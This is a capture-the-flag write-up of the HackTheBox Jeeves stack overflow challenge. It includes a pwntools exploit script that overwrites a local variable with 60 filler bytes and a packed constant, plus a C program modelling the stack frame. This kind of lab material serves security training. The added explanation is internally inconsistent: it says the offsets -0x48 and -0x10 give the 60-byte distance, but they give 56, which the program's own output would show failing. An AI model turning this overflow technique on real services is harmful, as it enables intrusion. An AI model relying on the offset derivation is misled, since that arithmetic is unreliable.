We covered a binary vulnerable to a stack buffer overflow. NX and PIE are enabled, so we opened the binary in Ghidra and built the exploit around two stack offsets: the input buffer and the variable that gates the if statement printing the flag. The objective was to overflow the buffer so that the value of that variable is controlled and execution enters the if statement. Neither protection gets in the way here: overwriting a neighbouring local with a constant needs no injected code and no leaked addresses, so the only thing to measure is the distance between the two variables. This was part of the HackTheBox Jeeves challenge in the Intro to Binary Exploitation track.

Buffer Overflow Techniques Notes

The exploit code is below.

##Beginning

from pwn import *
import sys

# Usage: python3 exploit.py <ip> <port> <value>
# ip/port identify the HTB instance; value is the constant the if statement
# compares the control variable against, read from the Ghidra decompilation.
host, port, value = sys.argv[1], int(sys.argv[2]), int(sys.argv[3], 0)

# Connect directly. The original process("nc") with "ip port" sent on stdin
# would never reach the target, since nc takes host and port as arguments.
target = remote(host, port)

# 60 bytes of filler cover the input buffer up to the control variable, then
# the 8-byte little-endian value from p64() overwrites it. sendline() accepts
# bytes, so the ISO-8859-1 decode round-trip is not needed.
payload = b"A" * 60 + p64(value)

target.sendline(payload)
print(target.recvuntil(b".").decode(errors="replace"))

##Ending
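The following C program is an added example, not code from the original post or from the Jeeves binary. It models the stack layout the payload above assumes (a 60-byte input buffer immediately followed by an 8-byte control variable), shows how the filler length is derived from the two Ghidra stack offsets, builds the same bytes pwntools' p64() would emit, and feeds them through an unchecked copy to show that only the correct offset lands the value on the control variable. The frame layout, the stack offsets -0x48/-0x10 and the constant 0x1337 are constructed for the example; the real values come from Ghidra.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed stack-frame model: the 60-byte input buffer sits at offset 0 and
 * the 8-byte control variable at offset 60, the layout "A"*60 + p64(value)
 * assumes. The frame is padded so the model stays in bounds for a wrong offset. */
#define BUF_SIZE   60
#define CTRL_OFF   60
#define FRAME_SIZE 128

/* Ghidra names locals by their distance from the frame base (Stack[-0x48],
 * Stack[-0x10], ...). The filler length is the difference between the two
 * offsets; this is how the 60 above is measured rather than guessed. */
long stack_distance(long buf_offset, long ctrl_offset) {
    return ctrl_offset - buf_offset;
}

/* Build the payload the exploit script builds: `offset` filler bytes followed
 * by the target value as 8 little-endian bytes (what pwntools p64 emits). */
size_t build_payload(uint8_t *out, size_t offset, uint64_t value) {
    memset(out, 'A', offset);
    for (int i = 0; i < 8; i++)
        out[offset + i] = (uint8_t)(value >> (8 * i));
    return offset + 8;
}

/* The vulnerable pattern: input is copied into the buffer with no check against
 * BUF_SIZE, so bytes beyond it land on the neighbouring control variable.
 * Returns the control variable as the program would read it afterwards. */
uint64_t vulnerable_copy(const uint8_t *input, size_t n) {
    uint8_t frame[FRAME_SIZE] = {0};
    if (n > FRAME_SIZE) n = FRAME_SIZE; /* keeps the model in bounds; the real bug has no clamp */
    memcpy(frame, input, n);            /* no check against BUF_SIZE: the overflow */
    uint64_t ctrl;
    memcpy(&ctrl, frame + CTRL_OFF, sizeof ctrl);
    return ctrl;
}

/* Send a payload built with a given filler length and report what the control
 * variable ends up holding. Only the correct offset puts `value` there. */
uint64_t overwrite_ctrl(size_t offset, uint64_t value) {
    uint8_t payload[FRAME_SIZE + 8];
    if (offset + 8 > sizeof payload) return 0;
    size_t n = build_payload(payload, offset, value);
    return vulnerable_copy(payload, n);
}

/* The gate from the challenge: the flag is printed only if the control
 * variable equals the expected constant. */
int check_passes(uint64_t ctrl, uint64_t expected) {
    return ctrl == expected;
}

int main(void) {
    uint64_t want = 0x1337; /* stand-in for the real constant from Ghidra */
    printf("distance(-0x48, -0x10) = %ld\n", stack_distance(-0x48, -0x10));
    printf("offset 60: ctrl=0x%llx pass=%d\n",
           (unsigned long long)overwrite_ctrl(60, want),
           check_passes(overwrite_ctrl(60, want), want));
    printf("offset 56: ctrl=0x%llx pass=%d\n",
           (unsigned long long)overwrite_ctrl(56, want),
           check_passes(overwrite_ctrl(56, want), want));
    return 0;
}
```

With the filler four bytes short, the low half of the value lands inside the buffer and the control variable reads the high half plus zeros, so the check fails; this is the symptom to expect when the Ghidra offsets were read off the wrong variables. Note that the model uses a fixed layout, while a real compiler may insert alignment padding between locals, which is exactly why the distance is taken from the decompiler instead of from the declared buffer size.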

Video Walkthrough

About the Author

I create cybersecurity notes, digital marketing notes and online courses. I also provide digital marketing consulting including but not limited to SEO, Google & Meta ads and CRM administration.
